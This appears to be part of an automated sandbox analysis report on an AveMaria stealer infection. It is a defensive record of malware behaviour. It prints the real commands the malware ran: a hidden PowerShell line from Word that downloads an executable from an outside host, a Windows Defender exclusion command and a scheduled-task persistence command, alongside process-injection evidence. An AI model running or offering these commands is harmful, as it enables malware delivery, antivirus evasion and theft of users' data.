Source: explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARETSOFTWARE\Oracle\VirtualBox Guest Additions
Source: explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\NSYSTEM\ControlSet001\Services\Disk\Enum
Source: explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Injects files into Windows application
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Injected file: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT was created by C:\Users\user\AppData\Roaming\explorer.exe Jump to behavior
Source: C:\Windows\System32\notepad.exe Injected file: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Source: C:\Windows\System32\notepad.exe Injected file: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Writes to foreign memory regions
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 414000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 419000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 54F000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 552000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 553000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FFFDE008 Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 414000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 419000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 54F000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 552000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 553000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FFFDE008 Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 414000
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 419000
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 54F000
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 552000
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 553000
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FFFDE008
Bypasses PowerShell execution policy
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -sta -noni -w hidden -executionpolicy bypass -nologo -command "(new-object system.net.webclient).downloadfile('http://login.929389.ankura.us/awogyiwg/explorer.exe','c:\users\user\appdata\roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -sta -noni -w hidden -executionpolicy bypass -nologo -command "(new-object system.net.webclient).downloadfile('http://login.929389.ankura.us/awogyiwg/explorer.exe','c:\users\user\appdata\roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -sta -noni -w hidden -executionpolicy bypass -nologo -command "(new-object system.net.webclient).downloadfile('http://login.929389.ankura.us/awogyiwg/explorer.exe','c:\users\user\appdata\roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -sta -noni -w hidden -executionpolicy bypass -nologo -command "(new-object system.net.webclient).downloadfile('http://login.929389.ankura.us/awogyiwg/explorer.exe','c:\users\user\appdata\roaming\explorer.exe') Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -sta -noni -w hidden -executionpolicy bypass -nologo -command "(new-object system.net.webclient).downloadfile('http://login.929389.ankura.us/awogyiwg/explorer.exe','c:\users\user\appdata\roaming\explorer.exe') Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -sta -noni -w hidden -executionpolicy bypass -nologo -command "(new-object system.net.webclient).downloadfile('http://login.929389.ankura.us/awogyiwg/explorer.exe','c:\users\user\appdata\roaming\explorer.exe') Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmp6336.tmp Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpFA37.tmp
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: MSBuild.exe, 00000011.00000002.1264622743.00000000006A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: MSBuild.exe, 00000011.00000002.1264622743.00000000006A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: t Program Manager
Source: MSBuild.exe, 00000011.00000002.1264622743.00000000006A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: J Program Managerr_
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Queries volume information: C:\Users\user\AppData\Roaming\explorer.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\explorer.exe Queries volume information: C:\Users\user\AppData\Roaming\explorer.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\explorer.exe Queries volume information: C:\Users\user\AppData\Roaming\explorer.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\explorer.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Increases the number of concurrent connection per server for Internet Explorer
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10 Jump to behavior
AV process strings found (often used to terminate AV products)
Source: explorer.exe, 00000014.00000002.994309984.0000000005DA9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: procdump.exe

Stealing of Sensitive Information
barindex
Yara detected AveMaria stealer
Source: Yara match File source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
